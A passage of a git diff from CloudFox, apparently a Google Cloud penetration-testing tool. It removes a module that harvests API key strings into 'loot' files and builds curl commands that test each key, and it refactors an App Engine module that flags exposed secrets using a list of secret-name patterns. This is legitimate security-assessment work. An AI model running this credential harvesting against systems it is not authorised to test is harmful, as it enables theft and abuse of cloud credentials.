[]apikeysservice.APIKeyInfo{}, - LootMap: make(map[string]*internal.LootFile), - } - - // Initialize loot files - module.initializeLootFiles() - - // Execute enumeration - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *APIKeysModule) Execute(ctx context.Context, logger internal.Logger) { - // Run enumeration with concurrency - m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_APIKEYS_MODULE_NAME, m.processProject) - - // Check results - if len(m.APIKeys) == 0 { - logger.InfoM("No API keys found", globals.GCP_APIKEYS_MODULE_NAME) - return - } - - // Count findings - unrestricted := 0 - highRisk := 0 - withKeyStrings := 0 - for _, key := range m.APIKeys { - if key.IsUnrestricted { - unrestricted++ - } - if key.RiskLevel == "HIGH" { - highRisk++ - } - if key.KeyString != "" { - withKeyStrings++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d API key(s) (%d unrestricted, %d high-risk, %d with key strings)", - len(m.APIKeys), unrestricted, highRisk, withKeyStrings), globals.GCP_APIKEYS_MODULE_NAME) - - // Write output - m.writeOutput(ctx, logger) -} - -// ------------------------------ -// Project Processor (called concurrently for each project) -// ------------------------------ -func (m *APIKeysModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Enumerating API keys in project: %s", projectID), globals.GCP_APIKEYS_MODULE_NAME) - } - - // Create service and fetch API keys - service := apikeysservice.New() - keys, err := service.ListAPIKeysWithKeyStrings(projectID) - if err != nil { - m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, globals.GCP_APIKEYS_MODULE_NAME, - fmt.Sprintf("Could not enumerate API keys in project %s", projectID)) - return - } - - // Thread-safe append - m.mu.Lock() - m.APIKeys = append(m.APIKeys, keys...) - - // Generate loot for each API key - for _, key := range keys { - m.addAPIKeyToLoot(key) - } - m.mu.Unlock() - - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Found %d API key(s) in project %s", len(keys), projectID), globals.GCP_APIKEYS_MODULE_NAME) - } -} - -// ------------------------------ -// Loot File Management -// ------------------------------ -func (m *APIKeysModule) initializeLootFiles() { - m.LootMap["apikeys-all"] = &internal.LootFile{ - Name: "apikeys-all", - Contents: "# All API Keys\n# Generated by CloudFox\n# Format: key_string|project|name|restrictions\n\n", - } - m.LootMap["apikeys-unrestricted"] = &internal.LootFile{ - Name: "apikeys-unrestricted", - Contents: "# Unrestricted API Keys\n# Generated by CloudFox\n# WARNING: These keys have no restrictions!\n\n", - } - m.LootMap["apikeys-high-risk"] = &internal.LootFile{ - Name: "apikeys-high-risk", - Contents: "# High-Risk API Keys\n# Generated by CloudFox\n\n", - } - m.LootMap["apikeys-test-commands"] = &internal.LootFile{ - Name: "apikeys-test-commands", - Contents: "# API Key Test Commands\n# Generated by CloudFox\n# Use these to verify key access\n\n", - } - m.LootMap["apikeys-key-strings"] = &internal.LootFile{ - Name: "apikeys-key-strings", - Contents: "", - } -} - -func (m *APIKeysModule) addAPIKeyToLoot(key apikeysservice.APIKeyInfo) { - // Extract key ID from full name - keyID := extractKeyID(key.Name) - - // Key string file (just the values) - if key.KeyString != "" { - m.LootMap["apikeys-key-strings"].Contents += key.KeyString + "\n" - } - - // All keys with details - restrictions := "unrestricted" - if key.HasRestrictions { - restrictions = key.RestrictionType - if len(key.AllowedAPIs) > 0 { - restrictions += fmt.Sprintf(" (APIs: %s)", strings.Join(key.AllowedAPIs, ", ")) - } - } - m.LootMap["apikeys-all"].Contents += fmt.Sprintf( - "# Key: %s\n"+ - "# Project: %s\n"+ - "# Display Name: %s\n"+ - "# Restrictions: %s\n"+ - "# Risk Level: %s\n", - keyID, - key.ProjectID, - key.DisplayName, - restrictions, - key.RiskLevel, - ) - if key.KeyString != "" { - m.LootMap["apikeys-all"].Contents += fmt.Sprintf("KEY_STRING=%s\n", key.KeyString) - } - m.LootMap["apikeys-all"].Contents += "\n" - - // Unrestricted keys - if key.IsUnrestricted { - m.LootMap["apikeys-unrestricted"].Contents += fmt.Sprintf( - "# Key: %s\n"+ - "# Project: %s\n"+ - "# Display Name: %s\n"+ - "# Created: %s\n", - keyID, - key.ProjectID, - key.DisplayName, - key.CreateTime.Format("2006-01-02"), - ) - if key.KeyString != "" { - m.LootMap["apikeys-unrestricted"].Contents += fmt.Sprintf("KEY_STRING=%s\n", key.KeyString) - } - m.LootMap["apikeys-unrestricted"].Contents += "\n" - } - - // High-risk keys - if key.RiskLevel == "HIGH" { - m.LootMap["apikeys-high-risk"].Contents += fmt.Sprintf( - "# Key: %s\n"+ - "# Project: %s\n"+ - "# Risk Level: %s\n"+ - "# Reasons:\n", - keyID, - key.ProjectID, - key.RiskLevel, - ) - for _, reason := range key.RiskReasons { - m.LootMap["apikeys-high-risk"].Contents += fmt.Sprintf(" - %s\n", reason) - } - if key.KeyString != "" { - m.LootMap["apikeys-high-risk"].Contents += fmt.Sprintf("KEY_STRING=%s\n", key.KeyString) - } - m.LootMap["apikeys-high-risk"].Contents += "\n" - } - - // Test commands - if key.KeyString != "" { - m.LootMap["apikeys-test-commands"].Contents += fmt.Sprintf( - "# Test key: %s (Project: %s)\n"+ - "# Try accessing various APIs with this key:\n"+ - "curl -H 'X-Goog-Api-Key: %s' 'https://maps.googleapis.com/maps/api/geocode/json?address=1600+Amphitheatre+Parkway'\n"+ - "curl -H 'X-Goog-Api-Key: %s' 'https://translation.googleapis.com/language/translate/v2?q=Hello&target=es'\n"+ - "curl -H 'X-Goog-Api-Key: %s' 'https://www.googleapis.com/customsearch/v1?q=test'\n\n", - keyID, - key.ProjectID, - key.KeyString, - key.KeyString, - key.KeyString, - ) - } -} - -// extractKeyID extracts the key ID from the full resource name -func extractKeyID(name string) string { - parts := strings.Split(name, "/") - if len(parts) > 0 { - return parts[len(parts)-1] - } - return name -} - -// ------------------------------ -// Output Generation -// ------------------------------ -func (m *APIKeysModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main API keys table - keysHeader := []string{ - "Key ID", - "Display Name", - "Project Name", - "Project", - "Restriction Type", - "API Targets", - "Age (days)", - "Risk", - "Has Key String", - } - - var keysBody [][]string - for _, key := range m.APIKeys { - keyID := extractKeyID(key.Name) - - restrictionType := key.RestrictionType - if restrictionType == "" { - restrictionType = "none" - } - - apiTargets := "-" - if len(key.AllowedAPIs) > 0 { - if len(key.AllowedAPIs) > 2 { - apiTargets = fmt.Sprintf("%s +%d more", strings.Join(key.AllowedAPIs[:2], ", "), len(key.AllowedAPIs)-2) - } else { - apiTargets = strings.Join(key.AllowedAPIs, ", ") - } - } - - age := "-" - if !key.CreateTime.IsZero() { - age = fmt.Sprintf("%d", int(time.Since(key.CreateTime).Hours()/24)) - } - - hasKeyString := "No" - if key.KeyString != "" { - hasKeyString = "Yes" - } - - keysBody = append(keysBody, []string{ - keyID, - key.DisplayName, - m.GetProjectName(key.ProjectID), - key.ProjectID, - restrictionType, - apiTargets, - age, - key.RiskLevel, - hasKeyString, - }) - } - - // Unrestricted keys table - unrestrictedHeader := []string{ - "Key ID", - "Display Name", - "Project Name", - "Project", - "Created", - "Has Key String", - } - - var unrestrictedBody [][]string - for _, key := range m.APIKeys { - if key.IsUnrestricted { - keyID := extractKeyID(key.Name) - created := "-" - if !key.CreateTime.IsZero() { - created = key.CreateTime.Format("2006-01-02") - } - hasKeyString := "No" - if key.KeyString != "" { - hasKeyString = "Yes" - } - - unrestrictedBody = append(unrestrictedBody, []string{ - keyID, - key.DisplayName, - m.GetProjectName(key.ProjectID), - key.ProjectID, - created, - hasKeyString, - }) - } - } - - // Restrictions detail table - restrictionsHeader := []string{ - "Key ID", - "Project Name", - "Project", - "Type", - "Allowed Values", - } - - var restrictionsBody [][]string - for _, key := range m.APIKeys { - if key.HasRestrictions { - keyID := extractKeyID(key.Name) - - // Add API restrictions - if len(key.AllowedAPIs) > 0 { - restrictionsBody = append(restrictionsBody, []string{ - keyID, - m.GetProjectName(key.ProjectID), - key.ProjectID, - "API", - strings.Join(key.AllowedAPIs, ", "), - }) - } - - // Add referer restrictions - if len(key.AllowedReferers) > 0 { - restrictionsBody = append(restrictionsBody, []string{ - keyID, - m.GetProjectName(key.ProjectID), - key.ProjectID, - "Referer", - strings.Join(key.AllowedReferers, ", "), - }) - } - - // Add IP restrictions - if len(key.AllowedIPs) > 0 { - restrictionsBody = append(restrictionsBody, []string{ - keyID, - m.GetProjectName(key.ProjectID), - key.ProjectID, - "IP", - strings.Join(key.AllowedIPs, ", "), - }) - } - - // Add Android app restrictions - if len(key.AllowedAndroidApps) > 0 { - restrictionsBody = append(restrictionsBody, []string{ - keyID, - m.GetProjectName(key.ProjectID), - key.ProjectID, - "Android", - strings.Join(key.AllowedAndroidApps, ", "), - }) - } - - // Add iOS app restrictions - if len(key.AllowedIOSApps) > 0 { - restrictionsBody = append(restrictionsBody, []string{ - keyID, - m.GetProjectName(key.ProjectID), - key.ProjectID, - "iOS", - strings.Join(key.AllowedIOSApps, ", "), - }) - } - } - } - - // High-risk keys table - highRiskHeader := []string{ - "Key ID", - "Project Name", - "Project", - "Risk Level", - "Risk Reasons", - } - - var highRiskBody [][]string - for _, key := range m.APIKeys { - if key.RiskLevel == "HIGH" || key.RiskLevel == "MEDIUM" { - keyID := extractKeyID(key.Name) - highRiskBody = append(highRiskBody, []string{ - keyID, - m.GetProjectName(key.ProjectID), - key.ProjectID, - key.RiskLevel, - strings.Join(key.RiskReasons, "; "), - }) - } - } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build tables - tables := []internal.TableFile{ - { - Name: "apikeys", - Header: keysHeader, - Body: keysBody, - }, - } - - // Add unrestricted keys table if there are any - if len(unrestrictedBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "apikeys-unrestricted", - Header: unrestrictedHeader, - Body: unrestrictedBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d unrestricted API key(s)!", len(unrestrictedBody)), globals.GCP_APIKEYS_MODULE_NAME) - } - - // Add restrictions table if there are any - if len(restrictionsBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "apikeys-restrictions", - Header: restrictionsHeader, - Body: restrictionsBody, - }) - } - - // Add high-risk table if there are any - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "apikeys-high-risk", - Header: highRiskHeader, - Body: highRiskBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d high/medium risk API key(s)", len(highRiskBody)), globals.GCP_APIKEYS_MODULE_NAME) - } - - output := APIKeysOutput{ - Table: tables, - Loot: lootFiles, - } - - // Write output using HandleOutputSmart with scope support - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_APIKEYS_MODULE_NAME) - m.CommandCounter.Error++ - } -} diff --git a/gcp/commands/appengine.go b/gcp/commands/appengine.go index ce1d1f35..959b040f 100644 --- a/gcp/commands/appengine.go +++ b/gcp/commands/appengine.go @@ -3,7 +3,6 @@ package commands import ( "context" "fmt" - "sort" "strings" "sync" @@ -31,18 +30,7 @@ Features: - Detects environment variable secrets - Reviews service account configurations - Identifies deprecated runtimes -- Analyzes traffic splitting configurations - -Security Checks: -- Public endpoints without IAP/authentication -- Secrets in environment variables -- Deprecated/vulnerable runtimes -- Over-permissioned service accounts -- Missing firewall rules - -Requires appropriate IAM permissions: -- roles/appengine.appViewer -- roles/appengine.serviceAdmin`, +- Analyzes traffic splitting configurations`, Run: runGCPAppEngineCommand, } @@ -51,8 +39,8 @@ Requires appropriate IAM permissions: // ------------------------------ type AppEngineApp struct { - ID string ProjectID string + ID string LocationID string AuthDomain string DefaultHostname string @@ -64,22 +52,22 @@ type AppEngineApp struct { } type AppEngineService struct { + ProjectID string ID string AppID string - ProjectID string - Split map[string]float64 // version -> traffic allocation + Split map[string]float64 DefaultURL string VersionCount int LatestVersion string } type AppEngineVersion struct { - ID string + ProjectID string ServiceID string + ID string AppID string - ProjectID string Runtime string - Environment string // standard, flexible + Environment string ServingStatus string CreateTime string InstanceClass string @@ -90,30 +78,18 @@ type AppEngineVersion struct { EnvVarCount int SecretEnvVars int ServiceAccount string - BasicScaling string - AutomaticScaling string - ManualScaling string URL string - RiskLevel string DeprecatedRuntime bool + DefaultSA bool + Public bool } type AppEngineFirewallRule struct { + ProjectID string Priority int64 - Action string // ALLOW, DENY + Action string SourceRange string Description string - ProjectID string -} - -type AppEngineSecurityIssue struct { - ServiceID string - VersionID string - ProjectID string - IssueType string - Severity string - Description string - Remediation string } // ------------------------------ @@ -122,16 +98,13 @@ type AppEngineSecurityIssue struct { type AppEngineModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - Apps []AppEngineApp - Services []AppEngineService - Versions []AppEngineVersion - FirewallRules []AppEngineFirewallRule - SecurityIssues []AppEngineSecurityIssue - LootMap map[string]*internal.LootFile - mu sync.Mutex + Apps []AppEngineApp + Services []AppEngineService + Versions []AppEngineVersion + FirewallRules []AppEngineFirewallRule + LootMap map[string]*internal.LootFile + mu sync.Mutex - // Tracking totalApps int totalServices int publicCount int @@ -153,27 +126,21 @@ func (o AppEngineOutput) LootFiles() []internal.LootFile { return o.Loot } // Command Entry Point // ------------------------------ func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { - // Initialize command context cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_APPENGINE_MODULE_NAME) if err != nil { return } - // Create module instance module := &AppEngineModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Apps: []AppEngineApp{}, - Services: []AppEngineService{}, - Versions: []AppEngineVersion{}, - FirewallRules: []AppEngineFirewallRule{}, - SecurityIssues: []AppEngineSecurityIssue{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Apps: []AppEngineApp{}, + Services: []AppEngineService{}, + Versions: []AppEngineVersion{}, + FirewallRules: []AppEngineFirewallRule{}, + LootMap: make(map[string]*internal.LootFile), } - // Initialize loot files module.initializeLootFiles() - - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -181,16 +148,14 @@ func runGCPAppEngineCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Enumerating App Engine applications and security configurations...", GCP_APPENGINE_MODULE_NAME) + logger.InfoM("Enumerating App Engine applications...", GCP_APPENGINE_MODULE_NAME) - // Create App Engine client aeService, err := appengine.NewService(ctx) if err != nil { logger.ErrorM(fmt.Sprintf("Failed to create App Engine service: %v", err), GCP_APPENGINE_MODULE_NAME) return } - // Process each project var wg sync.WaitGroup for _, projectID := range m.ProjectIDs { wg.Add(1) @@ -201,7 +166,6 @@ func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { } wg.Wait() - // Check results if m.totalApps == 0 { logger.InfoM("No App Engine applications found", GCP_APPENGINE_MODULE_NAME) return @@ -211,14 +175,13 @@ func (m *AppEngineModule) Execute(ctx context.Context, logger internal.Logger) { m.totalApps, m.totalServices, len(m.Versions)), GCP_APPENGINE_MODULE_NAME) if m.publicCount > 0 { - logger.InfoM(fmt.Sprintf("[HIGH] Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Found %d public service(s) without authentication", m.publicCount), GCP_APPENGINE_MODULE_NAME) } if m.secretsFound > 0 { - logger.InfoM(fmt.Sprintf("[CRITICAL] Found %d potential secret(s) in environment variables", m.secretsFound), GCP_APPENGINE_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Found %d potential secret(s) in environment variables", m.secretsFound), GCP_APPENGINE_MODULE_NAME) } - // Write output m.writeOutput(ctx, logger) } @@ -230,10 +193,8 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, logger.InfoM(fmt.Sprintf("Enumerating App Engine for project: %s", projectID), GCP_APPENGINE_MODULE_NAME) } - // Get App Engine application app, err := aeService.Apps.Get(projectID).Do() if err != nil { - // App Engine not enabled is common, don't show as error if !strings.Contains(err.Error(), "404") { m.CommandCounter.Error++ gcpinternal.HandleGCPError(err, logger, GCP_APPENGINE_MODULE_NAME, @@ -246,10 +207,9 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, m.totalApps++ m.mu.Unlock() - // Create app record appRecord := AppEngineApp{ - ID: app.Id, ProjectID: projectID, + ID: app.Id, LocationID: app.LocationId, AuthDomain: app.AuthDomain, DefaultHostname: app.DefaultHostname, @@ -266,10 +226,7 @@ func (m *AppEngineModule) processProject(ctx context.Context, projectID string, m.Apps = append(m.Apps, appRecord) m.mu.Unlock() - // Get services m.enumerateServices(ctx, projectID, aeService, logger) - - // Get firewall rules m.enumerateFirewallRules(ctx, projectID, aeService, logger) } @@ -288,12 +245,11 @@ func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID strin m.mu.Unlock() serviceRecord := AppEngineService{ + ProjectID: projectID, ID: svc.Id, AppID: projectID, - ProjectID: projectID, } - // Parse traffic split if svc.Split != nil { serviceRecord.Split = svc.Split.Allocations } @@ -302,13 +258,11 @@ func (m *AppEngineModule) enumerateServices(ctx context.Context, projectID strin m.Services = append(m.Services, serviceRecord) m.mu.Unlock() - // Get ingress settings from service (applies to all versions) - ingressSettings := "all" // Default + ingressSettings := "all" if svc.NetworkSettings != nil && svc.NetworkSettings.IngressTrafficAllowed != "" { ingressSettings = svc.NetworkSettings.IngressTrafficAllowed } - // Get versions for this service m.enumerateVersions(ctx, projectID, svc.Id, ingressSettings, aeService, logger) } } @@ -324,115 +278,61 @@ func (m *AppEngineModule) enumerateVersions(ctx context.Context, projectID, serv for _, ver := range versions.Versions { versionRecord := AppEngineVersion{ - ID: ver.Id, - ServiceID: serviceID, - AppID: projectID, - ProjectID: projectID, - Runtime: ver.Runtime, - Environment: ver.Env, - ServingStatus: ver.ServingStatus, - CreateTime: ver.CreateTime, - RiskLevel: "LOW", + ProjectID: projectID, + ServiceID: serviceID, + ID: ver.Id, + AppID: projectID, + Runtime: ver.Runtime, + Environment: ver.Env, + ServingStatus: ver.ServingStatus, + CreateTime: ver.CreateTime, + IngressSettings: ingressSettings, + ServiceAccount: ver.ServiceAccount, + URL: ver.VersionUrl, } - // Instance class if ver.InstanceClass != "" { versionRecord.InstanceClass = ver.InstanceClass } - // Network settings if ver.Network != nil { versionRecord.Network = ver.Network.Name } - // VPC connector if ver.VpcAccessConnector != nil { versionRecord.VPCConnector = ver.VpcAccessConnector.Name } - // Ingress settings (from service level) - versionRecord.IngressSettings = ingressSettings - - // Service account - versionRecord.ServiceAccount = ver.ServiceAccount - // Scaling type if ver.AutomaticScaling != nil { versionRecord.Scaling = "automatic" - if ver.AutomaticScaling.MaxConcurrentRequests > 0 { - versionRecord.AutomaticScaling = fmt.Sprintf("max_concurrent: %d", ver.AutomaticScaling.MaxConcurrentRequests) - } } else if ver.BasicScaling != nil { versionRecord.Scaling = "basic" - versionRecord.BasicScaling = fmt.Sprintf("max_instances: %d", ver.BasicScaling.MaxInstances) } else if ver.ManualScaling != nil { versionRecord.Scaling = "manual" - versionRecord.ManualScaling = fmt.Sprintf("instances: %d", ver.ManualScaling.Instances) } - // URL - versionRecord.URL = ver.VersionUrl - // Check for deprecated runtime versionRecord.DeprecatedRuntime = m.isDeprecatedRuntime(ver.Runtime) - if versionRecord.DeprecatedRuntime { - versionRecord.RiskLevel = "MEDIUM" - - m.mu.Lock() - m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ - ServiceID: serviceID, - VersionID: ver.Id, - ProjectID: projectID, - IssueType: "deprecated-runtime", - Severity: "MEDIUM", - Description: fmt.Sprintf("Runtime %s is deprecated and may have security vulnerabilities", ver.Runtime), - Remediation: "Migrate to a supported runtime version", - }) - m.mu.Unlock() - } // Check environment variables for secrets if ver.EnvVariables != nil { versionRecord.EnvVarCount = len(ver.EnvVariables) secretCount := m.analyzeEnvVars(ver.EnvVariables, serviceID, ver.Id, projectID) versionRecord.SecretEnvVars = secretCount - if secretCount > 0 { - versionRecord.RiskLevel = "CRITICAL" - } } // Check ingress settings for public access - if versionRecord.IngressSettings == "all" { + if versionRecord.IngressSettings == "all" || versionRecord.IngressSettings == "INGRESS_TRAFFIC_ALLOWED_ALL" { + versionRecord.Public = true m.mu.Lock() m.publicCount++ - if versionRecord.RiskLevel == "LOW" { - versionRecord.RiskLevel = "MEDIUM" - } - m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ - ServiceID: serviceID, - VersionID: ver.Id, - ProjectID: projectID, - IssueType: "public-ingress", - Severity: "MEDIUM", - Description: "Service accepts traffic from all sources", - Remediation: "Consider using 'internal-only' or 'internal-and-cloud-load-balancing' ingress", - }) m.mu.Unlock() } // Check for default service account if versionRecord.ServiceAccount == "" || strings.Contains(versionRecord.ServiceAccount, "@appspot.gserviceaccount.com") { - m.mu.Lock() - m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ - ServiceID: serviceID, - VersionID: ver.Id, - ProjectID: projectID, - IssueType: "default-service-account", - Severity: "LOW", - Description: "Using default App Engine service account", - Remediation: "Create a dedicated service account with minimal permissions", - }) - m.mu.Unlock() + versionRecord.DefaultSA = true } m.mu.Lock() @@ -452,34 +352,18 @@ func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID for _, rule := range rules.IngressRules { fwRule := AppEngineFirewallRule{ + ProjectID: projectID, Priority: rule.Priority, Action: rule.Action, SourceRange: rule.SourceRange, Description: rule.Description, - ProjectID: projectID, } m.mu.Lock() m.FirewallRules = append(m.FirewallRules, fwRule) m.mu.Unlock() - - // Check for overly permissive rules - if rule.Action == "ALLOW" && rule.SourceRange == "*" { - m.mu.Lock() - m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ - ServiceID: "all", - VersionID: "all", - ProjectID: projectID, - IssueType: "permissive-firewall", - Severity: "HIGH", - Description: fmt.Sprintf("Firewall rule (priority %d) allows all traffic", rule.Priority), - Remediation: "Restrict source ranges to known IP addresses", - }) - m.mu.Unlock() - } } - // Update app record with firewall count m.mu.Lock() for i := range m.Apps { if m.Apps[i].ProjectID == projectID { @@ -491,47 +375,28 @@ func (m *AppEngineModule) enumerateFirewallRules(ctx context.Context, projectID } func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, versionID, projectID string) int { - secretPatterns := map[string]string{ - "PASSWORD": "password", - "SECRET": "secret", - "API_KEY": "api-key", - "TOKEN": "token", - "PRIVATE_KEY": "credential", - "DATABASE_URL": "connection-string", - "DB_PASSWORD": "password", - "MYSQL_PASSWORD": "password", - "POSTGRES_PASSWORD": "password", - "MONGODB_URI": "connection-string", - "AWS_SECRET": "credential", - "ENCRYPTION_KEY": "credential", - "JWT_SECRET": "credential", - "SESSION_SECRET": "credential", + secretPatterns := []string{ + "PASSWORD", "SECRET", "API_KEY", "TOKEN", "PRIVATE_KEY", + "DATABASE_URL", "DB_PASSWORD", "MYSQL_PASSWORD", "POSTGRES_PASSWORD", + "MONGODB_URI", "AWS_SECRET", "ENCRYPTION_KEY", "JWT_SECRET", "SESSION_SECRET", } secretCount := 0 for name := range envVars { nameUpper := strings.ToUpper(name) - for pattern, secretType := range secretPatterns { + for _, pattern := range secretPatterns { if strings.Contains(nameUpper, pattern) { secretCount++ m.mu.Lock() m.secretsFound++ - m.SecurityIssues = append(m.SecurityIssues, AppEngineSecurityIssue{ - ServiceID: serviceID, - VersionID: versionID, - ProjectID: projectID, - IssueType: "secret-in-env", - Severity: "CRITICAL", - Description: fmt.Sprintf("Potential %s found in environment variable: %s", secretType, name), - Remediation: "Use Secret Manager instead of environment variables for secrets", - }) - - // Add to loot - m.LootMap["secrets-exposure"].Contents += fmt.Sprintf( - "Service: %s, Version: %s, Env Var: %s (%s)\n", - serviceID, versionID, name, secretType, + m.LootMap["appengine-commands"].Contents += fmt.Sprintf( + "# Potential secret in env var: %s (service: %s, version: %s)\n"+ + "# Recommendation: Migrate to Secret Manager\n"+ + "gcloud app versions describe %s --service=%s --project=%s\n\n", + name, serviceID, versionID, + versionID, serviceID, projectID, ) m.mu.Unlock() break @@ -544,17 +409,8 @@ func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, v func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { deprecatedRuntimes := []string{ - "python27", - "go111", - "go112", - "go113", - "java8", - "java11", - "nodejs10", - "nodejs12", - "php55", - "php72", - "ruby25", + "python27", "go111", "go112", "go113", "java8", "java11", + "nodejs10", "nodejs12", "php55", "php72", "ruby25", } for _, deprecated := range deprecatedRuntimes { @@ -569,17 +425,10 @@ func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { // Loot File Management // ------------------------------ func (m *AppEngineModule) initializeLootFiles() { - m.LootMap["app-engine-commands"] = &internal.LootFile{ - Name: "app-engine-commands", - Contents: "# App Engine Security Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["public-services"] = &internal.LootFile{ - Name: "public-services", - Contents: "# Public App Engine Services\n# Generated by CloudFox\n\n", - } - m.LootMap["secrets-exposure"] = &internal.LootFile{ - Name: "secrets-exposure", - Contents: "# Secrets Exposed in Environment Variables\n# Generated by CloudFox\n# CRITICAL: Migrate these to Secret Manager!\n\n", + m.LootMap["appengine-commands"] = &internal.LootFile{ + Name: "appengine-commands", + Contents: "# App Engine Commands\n" + + "# Generated by CloudFox\n\n", } } @@ -587,139 +436,149 @@ func (m *AppEngineModule) initializeLootFiles() { // Output Generation // ------------------------------ func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Sort versions by risk level - sort.Slice(m.Versions, func(i, j int) bool { - riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} - return riskOrder[m.Versions[i].RiskLevel] < riskOrder[m.Versions[j].RiskLevel] - }) + var tables []internal.TableFile - // App Engine Apps table - appsHeader := []string{ - "App ID", - "Project Name", + // Unified table with all columns + header := []string{ "Project ID", + "Project Name", + "App ID", "Location", "Status", "Hostname", - "FW Rules", - } - - var appsBody [][]string - for _, app := range m.Apps { - appsBody = append(appsBody, []string{ - app.ID, - m.GetProjectName(app.ProjectID), - app.ProjectID, - app.LocationID, - app.ServingStatus, - truncateString(app.DefaultHostname, 40), - fmt.Sprintf("%d", app.FirewallRules), - }) - } - - // App Engine Services table - servicesHeader := []string{ "Service", - "Project Name", - "Project ID", - "Versions", + "Version", + "Runtime", + "Environment", + "Ingress", + "Public", + "Service Account", + "Default SA", + "Deprecated", + "Env Vars", + "Secrets", + "VPC Connector", + "URL", } - var servicesBody [][]string - for _, svc := range m.Services { - versionsCount := 0 + var body [][]string + + if len(m.Versions) > 0 { + // We have versions - show full details for each version for _, ver := range m.Versions { - if ver.ServiceID == svc.ID && ver.ProjectID == svc.ProjectID { - versionsCount++ + // Find the corresponding app for this version + var app AppEngineApp + for _, a := range m.Apps { + if a.ProjectID == ver.ProjectID { + app = a + break + } } - } - servicesBody = append(servicesBody, []string{ - svc.ID, - m.GetProjectName(svc.ProjectID), - svc.ProjectID, - fmt.Sprintf("%d", versionsCount), - }) - } + publicStr := "No" + if ver.Public { + publicStr = "Yes" + } - // App Engine Versions table - versionsHeader := []string{ - "Service", - "Version", - "Runtime", - "Env", - "Ingress", - "Scaling", - "Risk", - } + defaultSAStr := "No" + if ver.DefaultSA { + defaultSAStr = "Yes" + } - var versionsBody [][]string - for _, ver := range m.Versions { - versionsBody = append(versionsBody, []string{ - ver.ServiceID, - ver.ID, - ver.Runtime, - ver.Environment, - ver.IngressSettings, - ver.Scaling, - ver.RiskLevel, - }) + deprecatedStr := "No" + if ver.DeprecatedRuntime { + deprecatedStr = "Yes" + } - // Add public services to loot - if ver.IngressSettings == "all" { - m.LootMap["public-services"].Contents += fmt.Sprintf( - "Service: %s, Version: %s, URL: %s\n", - ver.ServiceID, ver.ID, ver.URL, - ) - } - } + body = append(body, []string{ + ver.ProjectID, + m.GetProjectName(ver.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + ver.ServiceID, + ver.ID, + ver.Runtime, + ver.Environment, + ver.IngressSettings, + publicStr, + ver.ServiceAccount, + defaultSAStr, + deprecatedStr, + fmt.Sprintf("%d", ver.EnvVarCount), + fmt.Sprintf("%d", ver.SecretEnvVars), + ver.VPCConnector, + ver.URL, + }) - // Security Issues table - issuesHeader := []string{ - "Service", - "Version", - "Issue", - "Severity", - "Description", + // Add to loot + if ver.Public { + m.LootMap["appengine-commands"].Contents += fmt.Sprintf( + "# Public App Engine service: %s/%s\n"+ + "curl %s\n\n", + ver.ServiceID, ver.ID, ver.URL, + ) + } + } + } else { + // No versions - show app info with "No services deployed" for version columns + for _, app := range m.Apps { + body = append(body, []string{ + app.ProjectID, + m.GetProjectName(app.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + "No services deployed", + "", + "", + "", + "", + "", + app.ServiceAccount, + "", + "", + "", + "", + "", + "", + }) + } } - var issuesBody [][]string - for _, issue := range m.SecurityIssues { - issuesBody = append(issuesBody, 